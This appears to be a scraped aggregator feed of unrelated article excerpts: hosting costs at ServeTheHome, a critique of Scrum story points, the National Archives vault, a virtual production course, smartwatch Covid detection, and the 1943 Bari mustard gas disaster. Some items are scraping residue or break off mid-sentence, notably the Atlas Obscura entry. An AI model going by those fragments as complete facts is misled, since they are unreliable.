“Rome” systems. We are testing the Ampere Altra 80-core server right now, and we are at the point where we might consider using Arm in the hosting cluster this year. We are going to increase our hardware budget to $10,000 this year. Although we did not use most of our hardware budget in 2019 nor 2020, we expect to in 2021. Making up our monthly cost, we increased a bit for inflation. We used a $895/ mo budget in 2018. Our costs are effectively flat, but we are going to assume a bit more labor to install servers/ upgrade the hardware. We are budgeting $22,000 per year or around $1833.33 per month. This is about the same as we would need for EC2’s 3-year partial upfront reserved instance, albeit without the up-front costs. The one item that skews this substantially, is that we are not replacing every node every year. We are now in a very different place than we were when we started this journey. We have existing infrastructure that is frankly fine from a performance and node count standpoint even though we have relatively under-invested over the past 32 months. We had budgeted around $1687/ month for the last two months and spent under $1000. Still, at some point, we like to replace equipment before it fails. There is clearly a lot going into this. We now have just under 8 years since this 10U colocation spot in Las Vegas was our first setup: What is not reflected in our discussion is all of the lessons learned along the way. Also, as hardware has gotten faster, and memory prices have decreased, the cost of self-hosting has gone down significantly for our applications. We are also taking advantage of falling bandwidth prices. While AWS is absolutely the right choice for many applications, and indeed we use them, for our web hosting it is not what we want for a simple and inexpensive setup. This may not be the perfect analysis, but it is a little bit of how we now look at hosting at STH.
2
Reporter's fiery interview with Taliban leader after Afghanistan devastation
Your browser isn’t supported anymore. Update it to get the best YouTube experience and our latest features. Learn more
1
Islands of Interactivity with Vue in Vite.js
New content is available
1
An atomic bomb-proof strongbox protects the U.S. Constitution
The National Archives building in Washington, D.C. houses some of the United States’ most foundational texts, including the Constitution, the Bill of Rights, and the Declaration of Independence. These three documents are collectively known as the Charters of Freedom, and could be the most closely guarded pieces of paper on the planet. During the day these important texts are available for public viewing under bulletproof glass and constant guard. But every night (and at the press of a button, should the need arise) a special elevator pulls them underground into a custom-built armored vault. The original vault was built in 1953 by the span. The firm was the logical choice, having previously taken on notable achievements like the gold bullion vault at Fort Knox, and a bank vault in Hiroshima that p . The original, 55-ton Mosler Vault was the size of a walk-in closet and employed a 20-foot scissor jack to raise and lower the Charters of Freedom. A 1953 documentary shows the lift in operation p . The Mosler Vault was replaced in the early 2000s as the National Archive underwent a major $110 million renovation. The current vault, designed by Diebold, is still p . Know Before You Go The National Archives building is open to the public 10 a.m. to 5:30 p.m. Atlas Obscura Experiences The Spies of Georgetown Community Contributors Added by Elliot Carter A Edited by MagnumPI, AF Published January 24, 2017 Edit this listing p First FDR Memorial 0.10 miles Temperance Fountain 0.11 miles Man Controlling Trade 0.13 miles
1
Story Points
In Scrum, the idea of a sprint is well named: as a team, you are trying to complete work on a whole bunch of work items (stories) before a deadline. In a previous article in this series, Fixing Scrum we took against the idea of fixed time-boxes generally, because they introduce more problems than they solve: as we’ve seen in multiple articles, estimating is hard, trying to use it as a solution to anything is misguided. So you should only estimate when you absolutely need to. Nevertheless, knowing how long things will take is really the whole purpose of this track on Estimating, and sometimes unavoidable deadlines make it necessary. In Scrum, the Estimation process is based on the concept of story points, so that will be the focus here, although essentially this discussion is relevant to anyone estimating software development. In this article we will critique story points as an estimation tool. First, we will break it down to see how it works (the diagram above will guide us) then we’ll offer some ideas for improving it. At a basic level, to calculate the number of story points for an item of work, you need the following inputs: A Story: you’re going to need a description of the work you’re building Some Developers: you’re going to need developers to bring their experience of how long things take to build, and a willingness to share their thoughts and argue about the story. A Project: Since the story will be embedded in the context of a project, this is an important input. On some projects, work is harder to complete than on others. Things like the choice of languages or architectures have an effect, as do the systems and people the project needs to interface with. Team Experience: Over time, the team become more experienced both working with each other and with the project itself. They learn the Risk Landscape and understand where the pitfalls lie and how to avoid them. As shown in the above diagram, you take all of these inputs, mix them together and out pops a number of story points. How does that work? How do we get from one to the other? Scrum literature says that you should “play planning poker” in order to arrive at a number of story points. In my experience, you end up with conversations like this: “Rob, you’ve played an 8. Everyone else played a 3. What’s your thinking there?” “OK, well, first, I can see that we need to mock-up a web page. Now, it’s clearly not that complex a job, but, we’ll need to run it by the sales team, and they’re notoriously hard to schedule meetings with… and we’ll need a few of them in the meeting. So, if we assume that there’s going to be two or maybe three iterations of this, it’ll soon add up into days gone by.” “I’m thinking a 2 for this task.” “I’m thinking a 5: we’re actually going to have to implement some new indexes on the database, so it’s an optimisation issue. And there could be some locking problems around the Users table if we are running this update alongside everything else”. What’s happening here? We are basically alerting each other to the risks and tasks we think are present on the story. That’s the value the experience of the team and the developers brings to the table. After some back-and-forth, the team agrees on a number. But what does this number represent? Let’s look at some interpretations: Ideal Person-Days: An obvious interpretation is that a story point is some number of person-days. In most of the planning sessions I’ve been involved in, there is either an explicit or tacit base-lining of story points so that everyone has a similar conception of how much work is involved in one, e.g. “A Story point is a morning”. The “ideal” part refers to the actual time you get to spend on a task, away from interruptions, lunches, all-hands meetings and so on. The reason not to use person days directly is that developers all work at different speeds. strong: An alternate view is that a story point is about complexity . This means a Sprint is all about budgeting complexity, rather than effort. This makes some sense - complexity is a recurring theme in Risk-First, after all. However, given that the sprint is measured in person-days, and the scrum leader is going to produce a report showing how many story points were completed in a sprint, it’s clear that complexity really is just a weak proxy for person-days anyway. In fact, there are lots of tasks that might be low-complexity, but take a lot of time anyway, such as designing 500 icons. This will clearly take a lot of time, but be low-complexity, so you better give it enough story points to represent the time you’ll spend on it. Relative Sizing: A third way of looking at it is that really, story points are just about relative sizing: it doesn’t matter what they refer to or how big they are, it’s all about trying to budget the right amount of work into the sprint. For example, you can either have two one-point stories, or a two-point story, and the effect on the sprint is the same. Because there is no fixed definition of the size of a story point, you do run the risk of story-point “inflation” or “deflation”. But unless you are trying to use them to plot team productivity over time, this shouldn’t really matter so much. And we’d never make the mistake of doing that, right? So while all the inputs seem good, there is a real lack of formalism about what exactly a story point is at the end of it. This makes it very hard to say exactly what goes on inside the “Calculate Story Points” function. Isn’t there some better way than this? Let’s see if we can make some suggestions. In his essay, “Choose Boring Technology”, Dan McKinley describes a theoretical idea of “Innovation Tokens”: “Let’s say every company gets about three innovation tokens. You can spend these however you want, but the supply is fixed for a long while… If you choose to write your website in NodeJS, you just spent one of your innovation tokens. If you choose to use MongoDB, you just spent one of your innovation tokens. If you choose to use service discovery tech that’s existed for a year or less, you just spent one of your innovation tokens… there are many choices of technology that are boring and good, or at least good enough. MySQL is boring. Postgres is boring. PHP is boring. “ - Choose Boring Technology, Dan McKinley What he’s driving at here is of course risk: with shiny (i.e. non-boring) technology, you pick up lots of Hidden Risk. Innovation Tokens are paying for time spent dealing with Hidden Risk. Dan’s contention is that not only do you have the up-front costs of integrating the shiny technology, but you also have a long tail of extra running costs, as you have to manage the new technology through to maturity in your environment. Put this way, couldn’t story points be some kind of “Innovation Token”? When re-framed this way, it becomes a lot clearer what the function “Calculate Story Points” is really attempting to do - it’s all about enumerating the risks of doing a certain task and making sure that we don’t bite off more than we can chew. If story points were simply person-days then “deploy ReliableDB” and “deploy ShinyDB” take about the same time. But, when considered from the point of view of risk, “deploy ShinyDB” should have a much higher story-point value. Sometimes, developers provide tolerances around their story-point estimates, “optimistically, 2 days, pessimistically, 4 days”. Usually, this subtlety gets lost in the planning process. It’s certainly not factored into the usual velocity calculations - we need something more robust. Another problem in Story Point estimation is bootstrapping. It is expected that, to start with, estimates made by inexperienced teams, or inexperienced team-members, are going to be poor. The expectation is also that over time, through domain experience, the estimates improve. This seems to happen somewhat in my experience. But nowhere near enough. A common complaint when tasks overrun is that the team were blind-sided by Hidden Risk, but in my experience this boils down to two things: Couldn’t we bootstrap the estimation process by providing an “Interference Checklist” for story points, based on the things that commonly throw spanners into the works? Below, I’ve sketched out a small section of what this might look like. The next article contains a more complete Interference Checklist that I’ve put together and you can modify for your own purposes. By starting discussions with an Interference Checklist, we can augment the “play planning poker” process by prompting people on things to think about, like “Do we know what done looks like here?”, “Is this going to affect some of our existing functionality?”, “How are we going to get it tested?”. A Checklist is a good way of asking questions in order that we can manage risk early on. It’s all about turning a Hidden Risk into one we’ve thought about. If the team runs through this list together, and then decides the task is a “five-story-pointer”, then surely that is a better, more rigorous approach than just plucking a number out of the air, as planning poker suggests. And, building up an Interference Checklist shouldn’t be a task done just during a retrospective. You should be allowed to add detail to it any time you like rather than waiting for a retrospective. If you’re struggling to implement some story on the project, is that because you were hit by a risk you already knew about? Is it on the list? If not, add it right there and then! Conversely, if the risk is on the list, were you prepared for it? Did someone correctly identify that it would come up? If not, can you work out why it got missed? In my opinion, one of the craziest, least well-justified elements of story point estimation is the insistence that they are sized to Fibonacci Sequence Numbers, (0, 1, 2, 3, 5, 8, 13, 21) which seems needlessly nerdy but also suggests an unearned confidence in our ability to precisely estimate story sizes. (How often can we really be sure it is an 8, not a 13?) The more options we have over the size of a story, the more difficult it is to be right. Also fewer possible sizes means we get more experience estimating work to fit that particular size. So here, I’ll stick with just three sizes, “Small”, “Medium” and “Large”, and we’ll set bounds according to the time they’ll likely take. You don’t have to use exactly these sizes. Use whatever works for your team, but keep the number of sizes low and the maximum length short: anything bigger than “Large” becomes unwieldy, and lacks a rapid feedback loop. Anything shorter than “Small” doesn’t really need an estimate anyway. Crucially, we’ll also allocate each size a risk budget: So, given a size, can you tell if a piece of work fits into it? The next step is to run through your Interference Checklist, and come up with a Risk Score for the work. Let’s look at an example: perhaps you are adding a new screen to your system for capturing user preferences. It looks like it’ll be a couple of days effort, so is it “Small”? Maybe the Interference Checklist for it looks like this: So this piece of work exceeds the risk budget for a “Small” item, and needs to be classed as at least “Medium”. The implementer might get lucky and not hit any issues, but the chances are something on the checklist will need extra time. Note that above I just show a small sample of the full Interference Checklist. With a bigger list, the real risk scores are likely to go a lot higher… your mileage may vary. In my view, the poker planning / story point process fails to produce a reliable estimate. Mainly, this is not entirely the fault of story points - estimating software development tasks is akin to the Halting Problem. In this series of articles, we’ve looked at how software can at times have Fractal Complexity, be like a journey of discovery or have nested layers of complexity - it is hard. Nevertheless, experience shows us that there are common modes of failure for software estimates: things we try to estimate and fail at. Having an Interference Checklist and Risk Budgets addresses that deficit. The next article is a complete Interference Checklist that you can take and try out on your own projects.
1
Show HN: Doppel – Leverage Your Web Development
{{ message }} maelswarm/doppel You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.
2
UK’s National Film TV School to Offer “Industry First” Virtual Production Course
Buoyed by its hugely successful use in the making of Disney+’s hit series and growing deployment in studios worldwide, virtual production will soon be offered as a course at one of the world’s most prestigious filmmaking colleges. In what it claims to be an “industry first,” The U.K.’s National Film and Television School, in partnership with WarnerMedia, WarnerMedia Access and StoryFutures Academy, is set to launch a new six-month, part-time certificate course in virtual production. Participants will be introduced to the core technical and filmmaking required to work on virtual production projects driven by Unreal Engine, with the course aimed at creatives from varied technical and creative backgrounds, including games, VFX, 3D animation, graphic design and those from camera department backgrounds. The first intake of the 24-week certificate will start at the end of January 2022 with an application deadline of Nov. 27. Made up of six modules, the course will be delivered via weekly online seminars, with six face-to-face weekend workshops taking place at the NFTX in Beaconsfield, optimizing its newly installed virtual production LED Stage. As part of efforts to strengthen diversity and inclusion within the industry, scholarship funding will be made available, with WarnerMedia and WarnerMedia Access underwriting 75 percent of the course fee. Additionally, the school will provide further financial assistance to successful applicants from diverse groups who may require the hardware or software upgrades, while travel grants will also be made available. “Virtual Production is quickly transforming the art and craft of filmmaking,” said NFTS director Jon Wardle. “As demand for skills in the VP landscape accelerates, being at the forefront of launching this innovative new course means we can equip creatives with the toolbox to understand how this exciting new leap in technology can help build and progress their career.” Added Karen Horne, WarnerMedia’s senior vp equity and inclusion: “The Virtual Production Certificate program is a wonderful addition to our talent activation initiatives at WarnerMedia Access. The skills and technology that the students are learning represent the future of production, and we are proud to partner with NFTS and to be leading the way with an inclusive lens.”
1
The dash to adapt smartwatches to help detect Covid infections
Five years ago, on a flight to Norway, Stanford University biologist Michael Snyder noticed that his body wasn’t behaving as it should. According to the multiple fitness trackers he happened to be wearing at the time, his heart rate was unusually high and his pulse ox — a measure of blood oxygen level — was unusually low. “When I landed, they never came back to normal,” he says. “So I knew something was up.” Snyder could guess what that something was: Two weeks earlier, he’d helped his brother install a fence in rural Massachusetts — tick country. Sure enough, soon after landing in Norway, he developed a fever consistent with Lyme disease. A Norwegian doctor gave him antibiotics to fight the infection until he returned home, when a test confirmed the diagnosis. “And the first clues were actually from my smartwatch and pulse ox,” Snyder says. “Pretty cool.” Snyder was wearing the devices as part of an ongoing study, started in 2010, in which his lab is tracking wearable and other data from about a hundred people, including him. (As we speak, he flashes his wrists, brandishing no fewer than four smartwatches.) “At the time we started, most people weren’t really even using them for health purposes,” he says — just to monitor daily activity. “We realized, Gosh, these are pretty good 24-7 monitors of your physiology.” He wondered what one could learn from all those data. Maybe a lot. In a review of Snyder’s personal smartwatch data over the two years before his Lyme disease experience, his team found evidence for three viral infections that had already been confirmed by testing — including one that was asymptomatic. “So every time I was ill, we could pick it up with high heart rate and skin temperature — prior to symptom onset,” he says. The researchers began to design algorithms to identify deviations from baseline vitals in anyone, with the goal of combining genetic, wearable and other data to predict metabolic disorders, estimate cardiovascular risk and make other health assessments remotely. Thus began a research path — now joined by labs around the world — that could enable smartwatches to detect when people are infected with Covid-19 before they’re tested, or even before they feel sick. In recent years, Snyder and a number of other research groups have used wearable devices to monitor heart health and detect infectious disease. Now, many have hope that the gadgets can be leveraged in the battle to stop the spread of Covid-19. SARS-CoV-2, the virus that causes Covid-19, has infected more than 100 million people and killed more than 2 million. Accelerating its spread, people carrying the virus can transmit it to others without knowing they’re infected. Massive rapid testing could curtail such transmission by alerting people to the infection, but most people don’t get tested every day, and there wouldn’t be sufficient resources to do so anyway. Finding ways to quickly identify those most likely to test positive could save lives. As Snyder suggests, the appeal of using smartwatches, fitness trackers and other such gadgets for this purpose is that they can monitor (depending on the device) heart rate, breathing rate, sleep, temperature, blood pressure and activity levels — and that tens of millions of Americans are already wearing them. “We see a potential to help” with Covid-19, says Giorgio Quer, the director of artificial intelligence at Scripps Research Translational Institute and one of the leaders of DETECT, one of the largest efforts so far to test this idea. In October, his team published a paper in Nature Medicine reporting on their findings in a study of 30,000 people who shared their health data last spring. They focused on device users who had been tested for Covid-19 at least once and who’d reported symptoms or lack thereof on a custom smartphone app. The study used a common accuracy metric called AUC; a high AUC requires minimizing both false positives and false negatives. The researchers’ primary question was whether wearable information — resting heart rate, sleep and activity — would add anything to self-reported symptoms. Indeed, it did. Using only symptoms, the simple hand-coded algorithm scored an AUC of 0.71. Daily sensor data alone performed about the same — 0.72. But by adding sensors to symptoms, the AUC reached 0.80, a statistically significant improvement. “The findings there are really exciting,” Quer says. In November, Snyder’s team at Stanford published a paper in Nature Biomedical Engineering describing their study of about 5,000 participants. It differs from the Scripps study in its resolution, zooming in on hour-by-hour changes in some measures. The Stanford group’s algorithm collects data on three signals, all relative to the person’s baseline — a high resting heart rate (a result of inflammation), a high ratio of resting heart rate to daily steps taken, and increased sleep (one way the body activates immune cells) — and looks for trends. Among 32 device wearers who had experienced Covid-19 symptoms, it detected signals related to reported symptoms a median of four days before those symptoms appeared. One limitation, though, is that this analysis, like the one at Scripps, was retrospective. That is, it looked back at data collected both before and after a prediction point, which isn’t much use if you want to catch infection as it happens. The eventual goal is a prospective system that detects possible illness in real time, helping wearers decide whether to seek testing or self-isolate. Snyder’s team did also evaluate their system in prospective mode. They ran a simulation: At any given point, if they ignored data they had collected after that point, could their system detect illness, even if there had been no reported symptoms? Twenty-four Fitbit wearers who’d gotten sick had enough presymptomatic data to test this hypothesis. In 15 of them, the system caught the illness. Stanford is now piloting a system that alerts wearable-device users to possible Covid-19 infection, using a two-alarm system. If signals surpass a certain threshold, it produces a yellow alarm. If they remain elevated for 12 hours, it produces a red alarm, strongly suggesting testing or isolating. If there were only a yellow alarm, Snyder says, frequent false alarms might cause some people to ignore alarms completely. Their system has already detected several cases in which the alarm has gone off prior to symptom onset, and it works with several watch types. Scripps is also designing an alert system, Quer says. Such systems don’t require FDA approval as long as they don’t offer diagnoses, he says. They might simply say you have an elevated heartrate, which correlates with various issues, including a respiratory virus such as Covid-19 or the flu. “It’s kind of like your thermometer,” Snyder says. “An elevated temperature could be due to several things.” One of the key challenges in any such alert system is the amount of uncertainty in the signal, making it hard to establish crisp baselines that, when breached, indicate a possible problem. Some people, for example, are on medications that muddy the data by affecting heart rate, or they have difficulty breathing due to severe asthma, as some did in Snyder’s study. And alarms can also be triggered by factors other than infection, including long flights, alcohol or stress. (“We call it the holiday bump,” Snyder says, whether due to travel or drinking or in-laws.) Researchers at Purdue University and a health technology company called physIQ are trying to meet this challenge in a study to improve wearable signals, with an eye toward Covid-19 detection. Participants wear a Samsung smartwatch and an electrocardiogram patch on their chest for five days. The patch collects more reliable heart rate data than the watch does. The researchers use it as training data so an algorithm can learn to interpret the watch data in a way that aligns with the patch data. Their goal is “to figure out how to get as much out of the wrist device as possible,” says Stephan Wegerich, physIQ’s chief science officer. Stay in the Know Sign up for the Knowable Magazine newsletter today The study also examines usability. Participants must wear the watch snugly to improve the signals, and, unlike with factory settings, it collects raw data at a high frequency, so users have to charge it twice a day for several hours to keep the battery alive. While that could make some casual smartwatch wearers balk, so far study participants haven’t complained. Craig Goergen, a bioengineer at Purdue, says it’s not been difficult for participants to figure out a routine that works for them. Worry over Covid-19 may motivate many more. One limitation to existing studies is that participants might be representative of smartwatch owners who are conscious of Covid-19 infection, but not representative of the wider population. Duke University’s CovIdentify project aims to ameliorate that problem. As in several other studies, anyone with a smartwatch can enroll, but, according to Jessilyn Dunn, a biomedical engineer at Duke, they’ve also given out 400 devices to those who didn’t have them. They’ve yet to report results. Meanwhile, Fitbit has conducted its own study, published in November in npj Digital Medicine. Their neural network, when limited to a false positive rate of 5 percent (the setting is adjustable), could detect 15 percent of Covid cases, and do so a day before onset of symptoms, using data from that day and the previous four. Not great, but better than nothing. Fitbit recently received $2.5 million from the Army to provide thousands of devices to healthcare workers and test a notification system for use in the field. But if you build it, will they come? “Even if these technologies exist, just having the technology alone is usually not enough,” says physician Mitesh Patel, director of the Penn Medicine Nudge Unit and coauthor of a paper in the Annual Review of Medicine on using wearable devices to monitor cardiovascular disease. “You might get the young and engaged, the quantified-selfers, to use these devices for Covid detection or heart rate variability,” he says. “But to get older patients, or the unmotivated, or patients of lower socioeconomic status, we have to think about mechanisms to both provide access and increase engagement.” Engagement is especially urgent, he says, because those are the groups that could benefit most from these types of algorithms. Behavioral nudges to encourage usage might include having families use them as a group, or having employers offer monetary incentives. Patel and others say they’re encouraged by recent progress, and that wearables may eventually be used to inform clinical decisions, beyond everyday wellness applications. According to Snyder, what they’re learning about Covid-19 detection might be applied to future pandemics, seasonal flu and other areas of medicine and public health. It could potentially save many lives. “The pandemic has really brought all of that to a head,” says Dunn, of Duke. “So I’m excited for us to be able to demonstrate what these things can do.”
2
The Bombing and the Breakthrough
The old port town of Bari, on Italy’s Adriatic coast, was bustling. It was December 2, 1943. The British had taken Puglia’s capital in September, and though the front now lay just 150 miles to the north, the medieval city, with its massive cliffs cradling the sea, had escaped the fighting almost unscathed. Only a few miles outside of town, lines of women and children begged for black-market food, but here shop windows were full of fruit, cakes and bread. Young couples strolled arm in arm. Even ice cream vendors were doing a brisk trade. Bari was a Mediterranean service hub, supplying the 500,000 Allied troops engaged in driving the Germans out of Italy. Grand waterfront buildings were recently designated the headquarters of the United States Fifteenth Air Force. The liberating Tommies had already chased the Nazis from the skies over Italy, and the British, who controlled the port, were so confident they had won the air war that Air Marshal Sir Arthur Coningham announced that Bari was all but immune from attack. “I would regard it as a personal affront and insult if the Luftwaffe should attempt any significant action in this area,” he said that day at a press conference. Four days earlier, the American Liberty ship John Harvey had pulled in with a convoy of nine other merchantmen, and some 30 Allied ships were crammed into the harbor, packed against the seawall and along the pier. Their holds were laden with everything from food and medical gear to engines, corrugated steel for landing strips, and 50-gallon drums of aviation fuel. Visible on the upper decks were tanks, armored personnel carriers, jeeps and ambulances. Bright lights winked atop huge cranes that hoisted baled equipment up and out. At 7:35 p.m.—a blinding flash followed by a terrific bang. The ancient port’s single antiaircraft battery opened fire. Then came an earsplitting explosion, then another, and another. German Junkers Ju-88s flew in low over the town, dropping bombs short of the harbor. Smoke and flames rose from the city’s winding streets. As incendiaries rained down on the harbor, turning night into day, gunners aboard the anchored ships scrambled to shoot down the enemy—too late. The attacking German airplanes fled into the night. The raid lasted less than 20 minutes. The Great Secret: The Classified World War II Disaster that Launched the War on Cancer p Buy Soon a tremendous roar came from the harbor. An exploding ammunition tanker sent a huge rolling mass of flames a thousand feet high. A reporter for Time magazine noted a “fiery panorama.” Eight ships were already “burning fiercely,” he wrote, and the “entire center of the harbor was covered with burning oil.” A ruptured bulk-fuel pipeline sent thousands of gallons gushing into the harbor, where it ignited into a gigantic sheet of flame, engulfing the entire north side of the port. Flames leapt from ship to ship. Crews worked frantically to free ships before raging fires forced them to jump overboard and swim for it. The attack on Bari, which the press called “a little Pearl Harbor,” shook the complacency of the Allied forces, who had been convinced of their air superiority in Italy. All told, the Nazis sunk 17 Allied ships and destroyed more than 31,000 tons of valuable cargo. More than 1,000 American and British servicemen were killed, and almost as many wounded, along with hundreds of civilians. In the crucial days that followed, the task of treating gravely injured sailors would be made even more difficult by wartime secrecy. It would be almost 30 years before the world would learn the truth about what really took place that night, and even today few are aware of the surprising role of the disaster and its impact on the lives of ordinary Americans. Lt. Col. Stewart Francis Alexander, asleep in his quarters at Allied Force Headquarters in Algiers, was awake at the first harsh jangle of the telephone. There appeared to be a developing medical crisis in Bari. Too many men were dying, too quickly, of unexplained causes. The symptoms were unlike anything military physicians had seen before, and they had begun to suspect that the Germans had used an unknown poison gas. There was an urgent request for assistance. Alexander, a medical officer attached to the staff of Gen. Dwight D. Eisenhower at AFHQ, had received special training in chemical warfare. He was being dispatched immediately to the scene. Subscribe to Smithsonian magazine now for just $12 p Buy Alexander looked young for a combat physician. Five-foot-eight and skinny, he was 29, and only the hair thinning at his temples lent him an air of authority. He was popular with the troops, though some patients kidded that his gentle bedside manner was best suited to a pediatrician. But he had been through the brutal invasion of North Africa under Maj. Gen. George S. Patton, and despite a quiet modesty Alexander had proven himself determined and resourceful. He could have sat out the war in a stateside hospital or research laboratory, but the desire to serve ran deep. He was descended from self-made immigrants, part of a wave of Eastern European Jews who, fleeing famine and persecution, journeyed to the United States in the 1880s and ’90s and were forever grateful for the opportunity afforded them in their new home. Alexander’s father was an old-fashioned family practitioner in Park Ridge, New Jersey, and Alexander’s one ambition was to follow in his footsteps. After excelling at the Staunton Military Academy, in Virginia, he entered Dartmouth College at age 15. A standout in his science courses, he was allowed to advance directly to medical school in his senior year, graduating at the top of his class in 1935. After completing Dartmouth’s two-year program, he earned his medical degree from Columbia University, and did his residency training in New York. Then Alexander returned home, where he proudly hung his shingle next to his father’s. They enjoyed their shared dream of practicing medicine together for only a few months. In the spring of 1940, Alexander notified the draft board that he was “available any time.” He was called up in November and spent time with the 16th Infantry Regiment, stationed at Gunpowder Military Reservation, in Maryland, not far from Edgewood Arsenal, home of the Chemical Warfare Service, or CWS. Before long, he contacted CWS with an innovative new design for spectacles that fit within the facepiece of a gas mask. (He was granted a patent on the spectacles, but he turned the rights over to the Army.) Transferred to Edgewood, Alexander underwent a crash course in poison gases, consulting specialists and experimenting on animals to evaluate toxic agents and forms of treatment; he even investigated agents’ medicinal potential. After Pearl Harbor, he taught Army medical personnel how to treat chemical casualties. He was promoted to director of the Medical Division of CWS’s Research Laboratory at age 27, and when General Patton embarked in October 1942 with 35,000 troops to attack the coast of Morocco, the first time U.S. ground forces would face Axis armies, Alexander accompanied him as the Consultant in Chemical Warfare Medicine to the Western Task Force. Now, at 5 p.m. on December 7, 1943, five days after the attack on Bari, Alexander’s plane touched down at the city airfield. Waiting for him on the tarmac was the district’s senior British Royal Army Medical Corps officer and a group of hospital directors. “Their agitation was immediately apparent,” Alexander recalled, “and I was taken to the hospital at once.” The 98th British General Hospital, located in a large complex of brick buildings 15 minutes from the harbor, had been spared. Built on the monumental scale beloved by the Fascists, the Bari Polyclinic housed sizable medical wards, a surgical block and laboratories. “With every fresh explosion, the building creaked and rattled, rocking like a ship in a storm,” E. M. Somers Cocks, a nurse from New Zealand, recalled of the attack. “Doors were wrenched off hinges, windows were shattered, and the bricked-up windows scattered their bricks like hail.” A concussion blast knocked out the power, plunging the hospital into darkness. They were still sweeping up glass when the wounded began to arrive—hundreds of bloodied sailors suffering from shock, burns and exposure. Almost all of them were covered in thick, black crude oil. The litter-bearers brought up the rear, carrying the grievously injured. These were sailors who had jumped from blazing ships, or swum through pools of flaming oil, and were horribly burned. With so many patients needing urgent attention, there was no time to get many sailors out of their soiled clothes, so the ward matrons did what they could. The “immersion” cases received a shot of morphine, blankets to keep them warm and strong, hot, sweet tea. Then they were left to rest. A British nurse, Gwladys Rees, remembered trying to fix an intravenous line by the light of a match while the wind blew through shattered windows. “We worked by the dim glow of hurricane lamps, long into the night and early morning,” she recalled. “Intravenous bottles were dripping from every third bed, and the corridors were crammed with patients for whom we could find no accommodation.” The first "unusual" indication, the doctors informed Alexander, was that casualties did not present typical symptoms or respond to treatment in the typical manner. Many patients, despite a thready pulse and low blood pressure, did not appear to be in clinical shock. Instead of being restless or anxious, they were apathetic—some even said they felt “rather well”—and their extremities were warm rather than cold. After dawn, nurses observed that a few of the men complained of being thirsty, even though orderlies had just gone around with the drinks cart. Suddenly there were so many men clamoring for water the whole ward was in an uproar. Patients were yelling about the intense heat, tearing off their clothing, and, in their frenzy, trying to rip off their bandages. Overnight, the majority of immersion cases had developed red and inflamed skin, with blisters “as big as balloons and heavy with fluid,” Rees recalled. This, together with widespread nausea and vomiting, led doctors to think the cause might be poisonous fumes, possibly from the fuel oil and explosives. “We began to realize that most of our patients had been contaminated by something beyond all imagination,” she said. Six hours after the attack, patients who had managed to fall asleep awoke complaining of eye pain. They said their eyes felt “gritty, as though sand particles had gotten in,” Alexander wrote in his report. Within 24 hours, the wards were full of men with eyes swollen shut. As the staff’s unease deepened, British naval headquarters sent a notification that there was a “possibility of blister gas exposure” among the casualties. The hundreds of burn patients with unusual symptoms were to be classified “Dermatitis N.Y.D.”—not yet diagnosed—pending further instructions. Given the crush of casualties that first night, nonurgent cases who had appeared in “good condition” were sent away, sometimes in their wet uniforms. The next morning many returned, clearly needing treatment. Nurses tried to clean them up, scrubbing the black scum from patients’ skin with kerosene, but many took a turn for the worse. “We did everything humanly possible, but it was no good,” Rees said. “It was horrible to see these boys, so young and in so much obvious pain. We couldn’t even give them strong sedatives, since we weren’t quite sure how they would react with whatever had poisoned them.” The first unexplained death occurred 18 hours after the attack. Within two days, there were 14. Alexander noted the startling downward spiral. “Individuals that appeared in rather good condition in a matter of minutes would become moribund and die,” the doctors told him. The British doctors were mystified. The symptoms did not correspond to case histories of mustard gas poisoning from World War I, or to manuals issued by the Chemical Warfare Service. If the toxic agent was mustard—named for its unpleasant garlicky odor—respiratory complications should have been more prominent. Several days later, patients with no previous respiratory problems became congested and developed very sore throats, making it hard to swallow. These patients died not as a result of broncho-pneumonia, as might have been expected, but from cardio-circulatory failure. Alexander walked the crowded wards. He examined patients, gently lifting blankets to study their wounds. With extraordinary delicacy, he probed the strange patches of thickened red skin. He spoke with each patient in turn, asking how he had come by his injuries. Which ship was he on? How did he come to be rescued? Did he receive first aid at the docks? What about at the hospital? One sailor after another told of being caught in the firestorm, of the pandemonium, of somehow making it to the hospital. There they had waited for as long as 12 and even 24 hours before receiving treatment. Drawing back the covers from one patient, Alexander studied the burns on an otherwise healthy body. The sailor said he had been aboard a PT boat in the harbor when the German bombers flew over. He heard a loud boom as a nearby ship blew up, and the boat was hightailing it back to shore when he felt a spray of oily liquid land on his neck and run down his chest and back. Alexander observed the outline of raw, raised skin, shiny with ointment, delineating where he had been sprayed, as if the splash had been imprinted on his flesh. The burns Alexander had seen on other patients were varied, but already he could distinguish between chemical burns and those caused by fire and heat: “Certain patterns were present depending on how the individual had been exposed.” It appeared to Alexander that sailors who had been thrown overboard and completely immersed in the harbor were burned extensively, while those in boats had comparatively superficial burns wherever the toxic soup had hit them. Several men who had sat in the solution, possibly in lifeboats, had only local burns of the buttocks and groin. A few lucky souls who took it upon themselves to wipe off the oily mixture that first night sustained only minor injuries. As he made his rounds, it was increasingly clear to Alexander that most of these patients had been exposed to a chemical agent. His sense of smell supported his hypothesis. Entering the hospital, he had noticed something different from the usual cloying mix of sweat, urine and disinfectant. “Traces of an odor implanted in my mind said mustard gas,” he later recalled. He knew that the three most common blister agents were sulfur mustard, lewisite and nitrogen mustard. Although generally referred to as “gas,” all three agents were liquids at room temperature. And all three produced skin injuries resembling burns and serious eye injuries. Particularly worrying was the new, pure-grade nitrogen mustard developed by the Germans, which Alexander had studied the previous year, at Edgewood, after two classified samples were smuggled out of Germany. Its effects were reportedly more rapid than sulfur mustard, and it could penetrate intact skin and cause systemic poisoning. Practically colorless and odorless, apart from a faint fishy smell, it was not easily detected in the field. The Germans were also known to use mixtures of blister agents, so any combination was a real possibility. It had been five days since the initial exposure, and if there was any chance of saving the hundreds of Allied sailors lying in hospitals all over Bari, plus countless Italian civilians, he would need to act swiftly. He decided to put the question directly to the commanding officer of the 98th General Hospital, Col. Wellington J. Laird. “I feel these men may have been exposed to mustard in some manner, Colonel,” Alexander said tentatively. “Do you have any idea how this might have happened?” As the chemical warfare consultant to, Alexander was cleared to the “highest degree.” He knew the Allies had begun secretly stockpiling poison gas in the Mediterranean, in case Germany, with its back against the wall, resorted to all-out chemical warfare. But he was skeptical that the Allies would have shipped mustard shells into a busy port like Bari and allowed the toxic cargo to sit there as a prime target for an enemy strike. Still Alexander couldn’t rule it out. Tactfully, he tried again. “Have you checked with the port authorities?” he asked Laird. “Could the ships in the harbor have been carrying mustard?” Laird replied, “I have, and they tell me they have no such information available.” The burden of proof rested on him. He ordered a series of tests for the patients who were still alive, and insisted on “careful and complete autopsies” on patients who had died under mysterious circumstances. 